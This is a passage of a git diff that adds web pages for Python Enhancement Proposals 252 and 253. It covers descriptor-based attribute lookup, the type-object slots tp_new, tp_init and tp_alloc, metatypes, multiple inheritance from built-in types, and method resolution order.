  • In the simplest case, PyObject_GenericGetAttr() does exactly one +dictionary lookup: it looks up the attribute name in the type’s +dictionary (obj->ob_type->tp_dict). Upon success, there are two +possibilities: the descriptor has a get method, or it doesn’t. +For speed, the get and set methods are type slots: tp_descr_get +and tp_descr_set. If the tp_descr_get slot is non-NULL, it is +called, passing the object as its only argument, and the return +value from this call is the result of the getattr operation. If +the tp_descr_get slot is NULL, as a fallback the descriptor +itself is returned (compare class attributes that are not +methods but simple values).
  • +
  • PyObject_GenericSetAttr() works very similar but uses the +tp_descr_set slot and calls it with the object and the new +attribute value; if the tp_descr_set slot is NULL, an +AttributeError is raised.
  • +
  • But now for a more complicated case. The approach described +above is suitable for most built-in objects such as lists, +strings, numbers. However, some object types have a dictionary +in each instance that can store arbitrary attributes. In fact, +when you use a class statement to subtype an existing built-in +type, you automatically get such a dictionary (unless you +explicitly turn it off, using another advanced feature, +__slots__). Let’s call this the instance dict, to distinguish +it from the type dict.
  • +
  • In the more complicated case, there’s a conflict between names +stored in the instance dict and names stored in the type dict. +If both dicts have an entry with the same key, which one should +we return? Looking at classic Python for guidance, I find +conflicting rules: for class instances, the instance dict +overrides the class dict, except for the special attributes +(like __dict__ and __class__), which have priority over the +instance dict.
  • +
  • I resolved this with the following set of rules, implemented in +PyObject_GenericGetAttr():
      +
    1. Look in the type dict. If you find a data descriptor, use +its get() method to produce the result. This takes care of +special attributes like __dict__ and __class__.
    2. +
    3. Look in the instance dict. If you find anything, that’s it. +(This takes care of the requirement that normally the +instance dict overrides the class dict.)
    4. +
    5. Look in the type dict again (in reality this uses the saved +result from step 1, of course). If you find a descriptor, +use its get() method; if you find something else, that’s it; +if it’s not there, raise AttributeError.
    6. +
    +

    This requires a classification of descriptors as data and +nondata descriptors. The current implementation quite sensibly +classifies member and getset descriptors as data (even if they +are read-only!) and method descriptors as nondata. +Non-descriptors (like function pointers or plain values) are +also classified as non-data (!).

    +
  • +
  • This scheme has one drawback: in what I assume to be the most +common case, referencing an instance variable stored in the +instance dict, it does two dictionary lookups, whereas the +classic scheme did a quick test for attributes starting with two +underscores plus a single dictionary lookup. (Although the +implementation is sadly structured as instance_getattr() calling +instance_getattr1() calling instance_getattr2() which finally +calls PyDict_GetItem(), and the underscore test calls +PyString_AsString() rather than inlining this. I wonder if +optimizing the snot out of this might not be a good idea to +speed up Python 2.2, if we weren’t going to rip it all out. :-)
  • +
  • A benchmark verifies that in fact this is as fast as classic +instance variable lookup, so I’m no longer worried.
  • +
  • Modification for dynamic types: step 1 and 3 look in the +dictionary of the type and all its base classes (in MRO +sequence, or course).
  • +
+
+
+

Discussion

+

XXX

+
+
+

Examples

+

Let’s look at lists. In classic Python, the method names of +lists were available as the __methods__ attribute of list objects:

+
>>> [].__methods__
+['append', 'count', 'extend', 'index', 'insert', 'pop',
+'remove', 'reverse', 'sort']
+>>>
+
+
+

Under the new proposal, the __methods__ attribute no longer exists:

+
>>> [].__methods__
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+AttributeError: 'list' object has no attribute '__methods__'
+>>>
+
+
+

Instead, you can get the same information from the list type:

+
>>> T = [].__class__
+>>> T
+<type 'list'>
+>>> dir(T)                # like T.__dict__.keys(), but sorted
+['__add__', '__class__', '__contains__', '__eq__', '__ge__',
+'__getattr__', '__getitem__', '__getslice__', '__gt__',
+'__iadd__', '__imul__', '__init__', '__le__', '__len__',
+'__lt__', '__mul__', '__ne__', '__new__', '__radd__',
+'__repr__', '__rmul__', '__setitem__', '__setslice__', 'append',
+'count', 'extend', 'index', 'insert', 'pop', 'remove',
+'reverse', 'sort']
+>>>
+
+
+

The new introspection API gives more information than the old one: +in addition to the regular methods, it also shows the methods that +are normally invoked through special notations, e.g. __iadd__ +(+=), __len__ (len), __ne__ (!=). +You can invoke any method from this list directly:

+
>>> a = ['tic', 'tac']
+>>> T.__len__(a)          # same as len(a)
+2
+>>> T.append(a, 'toe')    # same as a.append('toe')
+>>> a
+['tic', 'tac', 'toe']
+>>>
+
+
+

This is just like it is for user-defined classes.

+

Notice a familiar yet surprising name in the list: __init__. This +is the domain of PEP 253.

+
+
+

Backwards compatibility

+

XXX

+
+
+

Warnings and Errors

+

XXX

+
+
+

Implementation

+

A partial implementation of this PEP is available from CVS as a +branch named “descr-branch”. To experiment with this +implementation, proceed to check out Python from CVS according to +the instructions at http://sourceforge.net/cvs/?group_id=5470 but +add the arguments “-r descr-branch” to the cvs checkout command. +(You can also start with an existing checkout and do “cvs update +-r descr-branch”.) For some examples of the features described +here, see the file Lib/test/test_descr.py.

+

Note: the code in this branch goes way beyond this PEP; it is also +the experimentation area for PEP 253 (Subtyping Built-in Types).

+
+
+

References

+

XXX

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0252.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0253/index.html b/pep-0253/index.html new file mode 100644 index 00000000000..209c5a12320 --- /dev/null +++ b/pep-0253/index.html @@ -0,0 +1,981 @@ + + + + + + + + PEP 253 – Subtyping Built-in Types | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 253 – Subtyping Built-in Types

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes additions to the type object API that will allow +the creation of subtypes of built-in types, in C and in Python.

+

[Editor’s note: the ideas described in this PEP have been incorporated +into Python. The PEP no longer accurately describes the implementation.]

+
+
+

Introduction

+

Traditionally, types in Python have been created statically, by +declaring a global variable of type PyTypeObject and initializing +it with a static initializer. The slots in the type object +describe all aspects of a Python type that are relevant to the +Python interpreter. A few slots contain dimensional information +(like the basic allocation size of instances), others contain +various flags, but most slots are pointers to functions to +implement various kinds of behaviors. A NULL pointer means that +the type does not implement the specific behavior; in that case +the system may provide a default behavior or raise an exception +when the behavior is invoked for an instance of the type. Some +collections of function pointers that are usually defined together +are obtained indirectly via a pointer to an additional structure +containing more function pointers.

+

While the details of initializing a PyTypeObject structure haven’t +been documented as such, they are easily gleaned from the examples +in the source code, and I am assuming that the reader is +sufficiently familiar with the traditional way of creating new +Python types in C.

+

This PEP will introduce the following features:

+
    +
  • a type can be a factory function for its instances
  • +
  • types can be subtyped in C
  • +
  • types can be subtyped in Python with the class statement
  • +
  • multiple inheritance from types is supported (insofar as +practical – you still can’t multiply inherit from list and +dictionary)
  • +
  • the standard coercion functions (int, tuple, str etc.) will +be redefined to be the corresponding type objects, which serve +as their own factory functions
  • +
  • a class statement can contain a __metaclass__ declaration, +specifying the metaclass to be used to create the new class
  • +
  • a class statement can contain a __slots__ declaration, +specifying the specific names of the instance variables +supported
  • +
+

This PEP builds on PEP 252, which adds standard introspection to +types; for example, when a particular type object initializes the +tp_hash slot, that type object has a __hash__ method when +introspected. PEP 252 also adds a dictionary to type objects +which contains all methods. At the Python level, this dictionary +is read-only for built-in types; at the C level, it is accessible +directly (but it should not be modified except as part of +initialization).

+

For binary compatibility, a flag bit in the tp_flags slot +indicates the existence of the various new slots in the type +object introduced below. Types that don’t have the +Py_TPFLAGS_HAVE_CLASS bit set in their tp_flags slot are assumed +to have NULL values for all the subtyping slots. (Warning: the +current implementation prototype is not yet consistent in its +checking of this flag bit. This should be fixed before the final +release.)

+

In current Python, a distinction is made between types and +classes. This PEP together with PEP 254 will remove that +distinction. However, for backwards compatibility the distinction +will probably remain for years to come, and without PEP 254, the +distinction is still large: types ultimately have a built-in type +as a base class, while classes ultimately derive from a +user-defined class. Therefore, in the rest of this PEP, I will +use the word type whenever I can – including base type or +supertype, derived type or subtype, and metatype. However, +sometimes the terminology necessarily blends, for example an +object’s type is given by its __class__ attribute, and subtyping +in Python is spelled with a class statement. If further +distinction is necessary, user-defined classes can be referred to +as “classic” classes.

+
+
+

About metatypes

+

Inevitably the discussion comes to metatypes (or metaclasses). +Metatypes are nothing new in Python: Python has always been able +to talk about the type of a type:

+
>>> a = 0
+>>> type(a)
+<type 'int'>
+>>> type(type(a))
+<type 'type'>
+>>> type(type(type(a)))
+<type 'type'>
+>>>
+
+
+

In this example, type(a) is a “regular” type, and type(type(a)) is +a metatype. While as distributed all types have the same metatype +(PyType_Type, which is also its own metatype), this is not a +requirement, and in fact a useful and relevant 3rd party extension +(ExtensionClasses by Jim Fulton) creates an additional metatype. +The type of classic classes, known as types.ClassType, can also be +considered a distinct metatype.

+

A feature closely connected to metatypes is the “Don Beaudry +hook”, which says that if a metatype is callable, its instances +(which are regular types) can be subclassed (really subtyped) +using a Python class statement. I will use this rule to support +subtyping of built-in types, and in fact it greatly simplifies the +logic of class creation to always simply call the metatype. When +no base class is specified, a default metatype is called – the +default metatype is the “ClassType” object, so the class statement +will behave as before in the normal case. (This default can be +changed per module by setting the global variable __metaclass__.)

+

Python uses the concept of metatypes or metaclasses in a different +way than Smalltalk. In Smalltalk-80, there is a hierarchy of +metaclasses that mirrors the hierarchy of regular classes, +metaclasses map 1-1 to classes (except for some funny business at +the root of the hierarchy), and each class statement creates both +a regular class and its metaclass, putting class methods in the +metaclass and instance methods in the regular class.

+

Nice though this may be in the context of Smalltalk, it’s not +compatible with the traditional use of metatypes in Python, and I +prefer to continue in the Python way. This means that Python +metatypes are typically written in C, and may be shared between +many regular types. (It will be possible to subtype metatypes in +Python, so it won’t be absolutely necessary to write C to use +metatypes; but the power of Python metatypes will be limited. For +example, Python code will never be allowed to allocate raw memory +and initialize it at will.)

+

Metatypes determine various policies for types, such as what +happens when a type is called, how dynamic types are (whether a +type’s __dict__ can be modified after it is created), what the +method resolution order is, how instance attributes are looked +up, and so on.

+

I’ll argue that left-to-right depth-first is not the best +solution when you want to get the most use from multiple +inheritance.

+

I’ll argue that with multiple inheritance, the metatype of the +subtype must be a descendant of the metatypes of all base types.

+

I’ll come back to metatypes later.

+
+
+

Making a type a factory for its instances

+

Traditionally, for each type there is at least one C factory +function that creates instances of the type (PyTuple_New(), +PyInt_FromLong() and so on). These factory functions take care of +both allocating memory for the object and initializing that +memory. As of Python 2.0, they also have to interface with the +garbage collection subsystem, if the type chooses to participate +in garbage collection (which is optional, but strongly recommended +for so-called “container” types: types that may contain references +to other objects, and hence may participate in reference cycles).

+

In this proposal, type objects can be factory functions for their +instances, making the types directly callable from Python. This +mimics the way classes are instantiated. The C APIs for creating +instances of various built-in types will remain valid and in some +cases more efficient. Not all types will become their own factory +functions.

+

The type object has a new slot, tp_new, which can act as a factory +for instances of the type. Types are now callable, because the +tp_call slot is set in PyType_Type (the metatype); the function +looks for the tp_new slot of the type that is being called.

+

Explanation: the tp_call slot of a regular type object (such as +PyInt_Type or PyList_Type) defines what happens when instances +of that type are called; in particular, the tp_call slot in the +function type, PyFunction_Type, is the key to making functions +callable. As another example, PyInt_Type.tp_call is NULL, because +integers are not callable. The new paradigm makes type objects +callable. Since type objects are instances of their metatype +(PyType_Type), the metatype’s tp_call slot (PyType_Type.tp_call) +points to a function that is invoked when any type object is +called. Now, since each type has to do something different to +create an instance of itself, PyType_Type.tp_call immediately +defers to the tp_new slot of the type that is being called. +PyType_Type itself is also callable: its tp_new slot creates a new +type. This is used by the class statement (formalizing the Don +Beaudry hook, see above). And what makes PyType_Type callable? +The tp_call slot of its metatype – but since it is its own +metatype, that is its own tp_call slot!

+

If the type’s tp_new slot is NULL, an exception is raised. +Otherwise, the tp_new slot is called. The signature for the +tp_new slot is

+
PyObject *tp_new(PyTypeObject *type,
+                 PyObject *args,
+                 PyObject *kwds)
+
+
+

where ‘type’ is the type whose tp_new slot is called, and ‘args’ +and ‘kwds’ are the sequential and keyword arguments to the call, +passed unchanged from tp_call. (The ‘type’ argument is used in +combination with inheritance, see below.)

+

There are no constraints on the object type that is returned, +although by convention it should be an instance of the given +type. It is not necessary that a new object is returned; a +reference to an existing object is fine too. The return value +should always be a new reference, owned by the caller.

+

Once the tp_new slot has returned an object, further initialization +is attempted by calling the tp_init() slot of the resulting +object’s type, if not NULL. This has the following signature:

+
int tp_init(PyObject *self,
+            PyObject *args,
+            PyObject *kwds)
+
+
+

It corresponds more closely to the __init__() method of classic +classes, and in fact is mapped to that by the slot/special-method +correspondence rules. The difference in responsibilities between +the tp_new() slot and the tp_init() slot lies in the invariants +they ensure. The tp_new() slot should ensure only the most +essential invariants, without which the C code that implements the +objects would break. The tp_init() slot should be used for +overridable user-specific initializations. Take for example the +dictionary type. The implementation has an internal pointer to a +hash table which should never be NULL. This invariant is taken +care of by the tp_new() slot for dictionaries. The dictionary +tp_init() slot, on the other hand, could be used to give the +dictionary an initial set of keys and values based on the +arguments passed in.

+

Note that for immutable object types, the initialization cannot be +done by the tp_init() slot: this would provide the Python user +with a way to change the initialization. Therefore, immutable +objects typically have an empty tp_init() implementation and do +all their initialization in their tp_new() slot.

+

You may wonder why the tp_new() slot shouldn’t call the tp_init() +slot itself. The reason is that in certain circumstances (like +support for persistent objects), it is important to be able to +create an object of a particular type without initializing it any +further than necessary. This may conveniently be done by calling +the tp_new() slot without calling tp_init(). It is also possible +that tp_init() is not called, or called more than once – its +operation should be robust even in these anomalous cases.

+

For some objects, tp_new() may return an existing object. For +example, the factory function for integers caches the integers -1 +through 99. This is permissible only when the type argument to +tp_new() is the type that defined the tp_new() function (in the +example, if type == &PyInt_Type), and when the tp_init() slot for +this type does nothing. If the type argument differs, the +tp_new() call is initiated by a derived type’s tp_new() to +create the object and initialize the base type portion of the +object; in this case tp_new() should always return a new object +(or raise an exception).

+

Both tp_new() and tp_init() should receive exactly the same ‘args’ +and ‘kwds’ arguments, and both should check that the arguments are +acceptable, because they may be called independently.

+

There’s a third slot related to object creation: tp_alloc(). Its +responsibility is to allocate the memory for the object, +initialize the reference count (ob_refcnt) and the type pointer +(ob_type), and initialize the rest of the object to all zeros. It +should also register the object with the garbage collection +subsystem if the type supports garbage collection. This slot +exists so that derived types can override the memory allocation +policy (like which heap is being used) separately from the +initialization code. The signature is:

+
PyObject *tp_alloc(PyTypeObject *type, int nitems)
+
+
+

The type argument is the type of the new object. The nitems +argument is normally zero, except for objects with a variable +allocation size (basically strings, tuples, and longs). The +allocation size is given by the following expression:

+
type->tp_basicsize  +  nitems * type->tp_itemsize
+
+
+

The tp_alloc slot is only used for subclassable types. The tp_new() +function of the base class must call the tp_alloc() slot of the +type passed in as its first argument. It is the tp_new() +function’s responsibility to calculate the number of items. The +tp_alloc() slot will set the ob_size member of the new object if +the type->tp_itemsize member is nonzero.

+

(Note: in certain debugging compilation modes, the type structure +used to have members named tp_alloc and a tp_free slot already, +counters for the number of allocations and deallocations. These +are renamed to tp_allocs and tp_deallocs.)

+

Standard implementations for tp_alloc() and tp_new() are +available. PyType_GenericAlloc() allocates an object from the +standard heap and initializes it properly. It uses the above +formula to determine the amount of memory to allocate, and takes +care of GC registration. The only reason not to use this +implementation would be to allocate objects from a different heap +(as is done by some very small frequently used objects like ints +and tuples). PyType_GenericNew() adds very little: it just calls +the type’s tp_alloc() slot with zero for nitems. But for mutable +types that do all their initialization in their tp_init() slot, +this may be just the ticket.

+
+
+

Preparing a type for subtyping

+

The idea behind subtyping is very similar to that of single +inheritance in C++. A base type is described by a structure +declaration (similar to the C++ class declaration) plus a type +object (similar to the C++ vtable). A derived type can extend the +structure (but must leave the names, order and type of the members +of the base structure unchanged) and can override certain slots in +the type object, leaving others the same. (Unlike C++ vtables, +all Python type objects have the same memory layout.)

+

The base type must do the following:

+
    +
  • Add the flag value Py_TPFLAGS_BASETYPE to tp_flags.
  • +
  • Declare and use tp_new(), tp_alloc() and optional tp_init() +slots.
  • +
  • Declare and use tp_dealloc() and tp_free().
  • +
  • Export its object structure declaration.
  • +
  • Export a subtyping-aware type-checking macro.
  • +
+

The requirements and signatures for tp_new(), tp_alloc() and +tp_init() have already been discussed above: tp_alloc() should +allocate the memory and initialize it to mostly zeros; tp_new() +should call the tp_alloc() slot and then proceed to do the +minimally required initialization; tp_init() should be used for +more extensive initialization of mutable objects.

+

It should come as no surprise that there are similar conventions +at the end of an object’s lifetime. The slots involved are +tp_dealloc() (familiar to all who have ever implemented a Python +extension type) and tp_free(), the new kid on the block. (The +names aren’t quite symmetric; tp_free() corresponds to tp_alloc(), +which is fine, but tp_dealloc() corresponds to tp_new(). Maybe +the tp_dealloc slot should be renamed?)

+

The tp_free() slot should be used to free the memory and +unregister the object with the garbage collection subsystem, and +can be overridden by a derived class; tp_dealloc() should +deinitialize the object (usually by calling Py_XDECREF() for +various sub-objects) and then call tp_free() to deallocate the +memory. The signature for tp_dealloc() is the same as it always +was:

+
void tp_dealloc(PyObject *object)
+
+
+

The signature for tp_free() is the same:

+
void tp_free(PyObject *object)
+
+
+

(In a previous version of this PEP, there was also a role reserved +for the tp_clear() slot. This turned out to be a bad idea.)

+

To be usefully subtyped in C, a type must export the structure +declaration for its instances through a header file, as it is +needed to derive a subtype. The type object for the base type +must also be exported.

+

If the base type has a type-checking macro (like PyDict_Check()), +this macro should be made to recognize subtypes. This can be done +by using the new PyObject_TypeCheck(object, type) macro, which +calls a function that follows the base class links.

+

The PyObject_TypeCheck() macro contains a slight optimization: it +first compares object->ob_type directly to the type argument, and +if this is a match, bypasses the function call. This should make +it fast enough for most situations.

+

Note that this change in the type-checking macro means that C +functions that require an instance of the base type may be invoked +with instances of the derived type. Before enabling subtyping of +a particular type, its code should be checked to make sure that +this won’t break anything. It has proved useful in the prototype +to add another type-checking macro for the built-in Python object +types, to check for exact type match too (for example, +PyDict_Check(x) is true if x is an instance of dictionary or of a +dictionary subclass, while PyDict_CheckExact(x) is true only if x +is a dictionary).

+
+
+

Creating a subtype of a built-in type in C

+

The simplest form of subtyping is subtyping in C. It is the +simplest form because we can require the C code to be aware of +some of the problems, and it’s acceptable for C code that doesn’t +follow the rules to dump core. For added simplicity, it is +limited to single inheritance.

+

Let’s assume we’re deriving from a mutable base type whose +tp_itemsize is zero. The subtype code is not GC-aware, although +it may inherit GC-awareness from the base type (this is +automatic). The base type’s allocation uses the standard heap.

+

The derived type begins by declaring a type structure which +contains the base type’s structure. For example, here’s the type +structure for a subtype of the built-in list type:

+
typedef struct {
+    PyListObject list;
+    int state;
+} spamlistobject;
+
+
+

Note that the base type structure member (here PyListObject) must +be the first member of the structure; any following members are +additions. Also note that the base type is not referenced via a +pointer; the actual contents of its structure must be included! +(The goal is for the memory layout of the beginning of the +subtype instance to be the same as that of the base type +instance.)

+

Next, the derived type must declare a type object and initialize +it. Most of the slots in the type object may be initialized to +zero, which is a signal that the base type slot must be copied +into it. Some slots that must be initialized properly:

+
    +
  • The object header must be filled in as usual; the type should +be &PyType_Type.
  • +
  • The tp_basicsize slot must be set to the size of the subtype +instance struct (in the above example: sizeof(spamlistobject)).
  • +
  • The tp_base slot must be set to the address of the base type’s +type object.
  • +
  • If the derived slot defines any pointer members, the +tp_dealloc slot function requires special attention, see +below; otherwise, it can be set to zero, to inherit the base +type’s deallocation function.
  • +
  • The tp_flags slot must be set to the usual Py_TPFLAGS_DEFAULT +value.
  • +
  • The tp_name slot must be set; it is recommended to set tp_doc +as well (these are not inherited).
  • +
+

If the subtype defines no additional structure members (it only +defines new behavior, no new data), the tp_basicsize and the +tp_dealloc slots may be left set to zero.

+

The subtype’s tp_dealloc slot deserves special attention. If the +derived type defines no additional pointer members that need to be +DECREF’ed or freed when the object is deallocated, it can be set +to zero. Otherwise, the subtype’s tp_dealloc() function must call +Py_XDECREF() for any PyObject * members and the correct memory +freeing function for any other pointers it owns, and then call the +base class’s tp_dealloc() slot. This call has to be made via the +base type’s type structure, for example, when deriving from the +standard list type:

+
PyList_Type.tp_dealloc(self);
+
+
+

If the subtype wants to use a different allocation heap than the +base type, the subtype must override both the tp_alloc() and the +tp_free() slots. These will be called by the base class’s +tp_new() and tp_dealloc() slots, respectively.

+

To complete the initialization of the type, PyType_InitDict() must +be called. This replaces slots initialized to zero in the subtype +with the value of the corresponding base type slots. (It also +fills in tp_dict, the type’s dictionary, and does various other +initializations necessary for type objects.)

+

A subtype is not usable until PyType_InitDict() is called for it; +this is best done during module initialization, assuming the +subtype belongs to a module. An alternative for subtypes added to +the Python core (which don’t live in a particular module) would be +to initialize the subtype in their constructor function. It is +allowed to call PyType_InitDict() more than once; the second and +further calls have no effect. To avoid unnecessary calls, a test +for tp_dict==NULL can be made.

+

(During initialization of the Python interpreter, some types are +actually used before they are initialized. As long as the slots +that are actually needed are initialized, especially tp_dealloc, +this works, but it is fragile and not recommended as a general +practice.)

+

To create a subtype instance, the subtype’s tp_new() slot is +called. This should first call the base type’s tp_new() slot and +then initialize the subtype’s additional data members. To further +initialize the instance, the tp_init() slot is typically called. +Note that the tp_new() slot should not call the tp_init() slot; +this is up to tp_new()’s caller (typically a factory function). +There are circumstances where it is appropriate not to call +tp_init().

+

If a subtype defines a tp_init() slot, the tp_init() slot should +normally first call the base type’s tp_init() slot.

+

(XXX There should be a paragraph or two about argument passing +here.)

+
+
+

Subtyping in Python

+

The next step is to allow subtyping of selected built-in types +through a class statement in Python. Limiting ourselves to single +inheritance for now, here is what happens for a simple class +statement:

+
class C(B):
+    var1 = 1
+    def method1(self): pass
+    # etc.
+
+
+

The body of the class statement is executed in a fresh environment +(basically, a new dictionary used as local namespace), and then C +is created. The following explains how C is created.

+

Assume B is a type object. Since type objects are objects, and +every object has a type, B has a type. Since B is itself a type, +we also call its type its metatype. B’s metatype is accessible +via type(B) or B.__class__ (the latter notation is new for types; +it is introduced in PEP 252). Let’s say this metatype is M (for +Metatype). The class statement will create a new type, C. Since +C will be a type object just like B, we view the creation of C as +an instantiation of the metatype, M. The information that needs +to be provided for the creation of a subclass is:

+
    +
  • its name (in this example the string “C”);
  • +
  • its bases (a singleton tuple containing B);
  • +
  • the results of executing the class body, in the form of a +dictionary (for example +{"var1": 1, "method1": <functionmethod1 at ...>, ...}).
  • +
+

The class statement will result in the following call:

+
C = M("C", (B,), dict)
+
+
+

where dict is the dictionary resulting from execution of the +class body. In other words, the metatype (M) is called.

+

Note that even though the example has only one base, we still pass +in a (singleton) sequence of bases; this makes the interface +uniform with the multiple-inheritance case.

+

In current Python, this is called the “Don Beaudry hook” after its +inventor; it is an exceptional case that is only invoked when a +base class is not a regular class. For a regular base class (or +when no base class is specified), current Python calls +PyClass_New(), the C level factory function for classes, directly.

+

Under the new system this is changed so that Python always +determines a metatype and calls it as given above. When one or +more bases are given, the type of the first base is used as the +metatype; when no base is given, a default metatype is chosen. By +setting the default metatype to PyClass_Type, the metatype of +“classic” classes, the classic behavior of the class statement is +retained. This default can be changed per module by setting the +global variable __metaclass__.

+

There are two further refinements here. First, a useful feature +is to be able to specify a metatype directly. If the class +suite defines a variable __metaclass__, that is the metatype +to call. (Note that setting __metaclass__ at the module level +only affects class statements without a base class and without an +explicit __metaclass__ declaration; but setting __metaclass__ in a +class suite overrides the default metatype unconditionally.)

+

Second, with multiple bases, not all bases need to have the same +metatype. This is called a metaclass conflict [1]. Some +metaclass conflicts can be resolved by searching through the set +of bases for a metatype that derives from all other given +metatypes. If such a metatype cannot be found, an exception is +raised and the class statement fails.

+

This conflict resolution can be implemented by the metatype +constructors: the class statement just calls the metatype of the first +base (or that specified by the __metaclass__ variable), and this +metatype’s constructor looks for the most derived metatype. If +that is itself, it proceeds; otherwise, it calls that metatype’s +constructor. (Ultimate flexibility: another metatype might choose +to require that all bases have the same metatype, or that there’s +only one base class, or whatever.)

+

(In [1], a new metaclass is automatically derived that is a +subclass of all given metaclasses. But since it is questionable +in Python how conflicting method definitions of the various +metaclasses should be merged, I don’t think this is feasible. +Should the need arise, the user can derive such a metaclass +manually and specify it using the __metaclass__ variable. It is +also possible to have a new metaclass that does this.)

+

Note that calling M requires that M itself has a type: the +meta-metatype. And the meta-metatype has a type, the +meta-meta-metatype. And so on. This is normally cut short at +some level by making a metatype be its own metatype. This is +indeed what happens in Python: the ob_type reference in +PyType_Type is set to &PyType_Type. In the absence of third party +metatypes, PyType_Type is the only metatype in the Python +interpreter.

+

(In a previous version of this PEP, there was one additional +meta-level, and there was a meta-metatype called “turtle”. This +turned out to be unnecessary.)

+

In any case, the work for creating C is done by M’s tp_new() slot. +It allocates space for an “extended” type structure, containing: +the type object; the auxiliary structures (as_sequence etc.); the +string object containing the type name (to ensure that this object +isn’t deallocated while the type object is still referencing it); and +some auxiliary storage (to be described later). It initializes this +storage to zeros except for a few crucial slots (for example, tp_name +is set to point to the type name) and then sets the tp_base slot to +point to B. Then PyType_InitDict() is called to inherit B’s slots. +Finally, C’s tp_dict slot is updated with the contents of the +namespace dictionary (the third argument to the call to M).

+
+
+

Multiple inheritance

+

The Python class statement supports multiple inheritance, and we +will also support multiple inheritance involving built-in types.

+

However, there are some restrictions. The C runtime architecture +doesn’t make it feasible to have a meaningful subtype of two +different built-in types except in a few degenerate cases. +Changing the C runtime to support fully general multiple +inheritance would be too much of an upheaval of the code base.

+

The main problem with multiple inheritance from different built-in +types stems from the fact that the C implementation of built-in +types accesses structure members directly; the C compiler +generates an offset relative to the object pointer and that’s +that. For example, the list and dictionary type structures each +declare a number of different but overlapping structure members. +A C function accessing an object expecting a list won’t work when +passed a dictionary, and vice versa, and there’s not much we could +do about this without rewriting all code that accesses lists and +dictionaries. This would be too much work, so we won’t do this.

+

The problem with multiple inheritance is caused by conflicting +structure member allocations. Classes defined in Python normally +don’t store their instance variables in structure members: they +are stored in an instance dictionary. This is the key to a +partial solution. Suppose we have the following two classes:

+
class A(dictionary):
+    def foo(self): pass
+
+class B(dictionary):
+    def bar(self): pass
+
+class C(A, B): pass
+
+
+

(Here, ‘dictionary’ is the type of built-in dictionary objects, +a.k.a. type({}) or {}.__class__ or types.DictType.) If we look at +the structure layout, we find that an A instance has the layout +of a dictionary followed by the __dict__ pointer, and a B instance +has the same layout; since there are no structure member layout +conflicts, this is okay.

+

Here’s another example:

+
class X(object):
+    def foo(self): pass
+
+class Y(dictionary):
+    def bar(self): pass
+
+class Z(X, Y): pass
+
+
+

(Here, ‘object’ is the base for all built-in types; its structure +layout only contains the ob_refcnt and ob_type members.) This +example is more complicated, because the __dict__ pointer for X +instances has a different offset than that for Y instances. Where +is the __dict__ pointer for Z instances? The answer is that the +offset for the __dict__ pointer is not hardcoded, it is stored in +the type object.

+

Suppose on a particular machine an ‘object’ structure is 8 bytes +long, and a ‘dictionary’ struct is 60 bytes, and an object pointer +is 4 bytes. Then an X structure is 12 bytes (an object structure +followed by a __dict__ pointer), and a Y structure is 64 bytes (a +dictionary structure followed by a __dict__ pointer). The Z +structure has the same layout as the Y structure in this example. +Each type object (X, Y and Z) has a “__dict__ offset” which is +used to find the __dict__ pointer. Thus, the recipe for looking +up an instance variable is:

+
    +
  1. get the type of the instance
  2. +
  3. get the __dict__ offset from the type object
  4. +
  5. add the __dict__ offset to the instance pointer
  6. +
  7. look in the resulting address to find a dictionary reference
  8. +
  9. look up the instance variable name in that dictionary
  10. +
+

Of course, this recipe can only be implemented in C, and I have +left out some details. But this allows us to use multiple +inheritance patterns similar to the ones we can use with classic +classes.

+

XXX I should write up the complete algorithm here to determine +base class compatibility, but I can’t be bothered right now. Look +at best_base() in typeobject.c in the implementation mentioned +below.

+
+
+

MRO: Method resolution order (the lookup rule)

+

With multiple inheritance comes the question of method resolution +order: the order in which a class or type and its bases are +searched looking for a method of a given name.

+

In classic Python, the rule is given by the following recursive +function, also known as the left-to-right depth-first rule:

+
def classic_lookup(cls, name):
+    if cls.__dict__.has_key(name):
+        return cls.__dict__[name]
+    for base in cls.__bases__:
+        try:
+            return classic_lookup(base, name)
+        except AttributeError:
+            pass
+    raise AttributeError, name
+
+
+

The problem with this becomes apparent when we consider a “diamond +diagram”:

+
      class A:
+        ^ ^  def save(self): ...
+       /   \
+      /     \
+     /       \
+    /         \
+class B     class C:
+    ^         ^  def save(self): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

Arrows point from a subtype to its base type(s). This particular +diagram means B and C derive from A, and D derives from B and C +(and hence also, indirectly, from A).

+

Assume that C overrides the method save(), which is defined in the +base A. (C.save() probably calls A.save() and then saves some of +its own state.) B and D don’t override save(). When we invoke +save() on a D instance, which method is called? According to the +classic lookup rule, A.save() is called, ignoring C.save()!

+

This is not good. It probably breaks C (its state doesn’t get +saved), defeating the whole purpose of inheriting from C in the +first place.

+

Why was this not a problem in classic Python? Diamond diagrams +are rarely found in classic Python class hierarchies. Most class +hierarchies use single inheritance, and multiple inheritance is +usually confined to mix-in classes. In fact, the problem shown +here is probably the reason why multiple inheritance is unpopular +in classic Python.

+

Why will this be a problem in the new system? The ‘object’ type +at the top of the type hierarchy defines a number of methods that +can usefully be extended by subtypes, for example __getattr__().

+

(Aside: in classic Python, the __getattr__() method is not really +the implementation for the get-attribute operation; it is a hook +that only gets invoked when an attribute cannot be found by normal +means. This has often been cited as a shortcoming – some class +designs have a legitimate need for a __getattr__() method that +gets called for all attribute references. But then of course +this method has to be able to invoke the default implementation +directly. The most natural way is to make the default +implementation available as object.__getattr__(self, name).)

+

Thus, a classic class hierarchy like this:

+
class B     class C:
+    ^         ^  def __getattr__(self, name): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

will change into a diamond diagram under the new system:

+
      object:
+        ^ ^  __getattr__()
+       /   \
+      /     \
+     /       \
+    /         \
+class B     class C:
+    ^         ^  def __getattr__(self, name): ...
+     \       /
+      \     /
+       \   /
+        \ /
+      class D
+
+
+

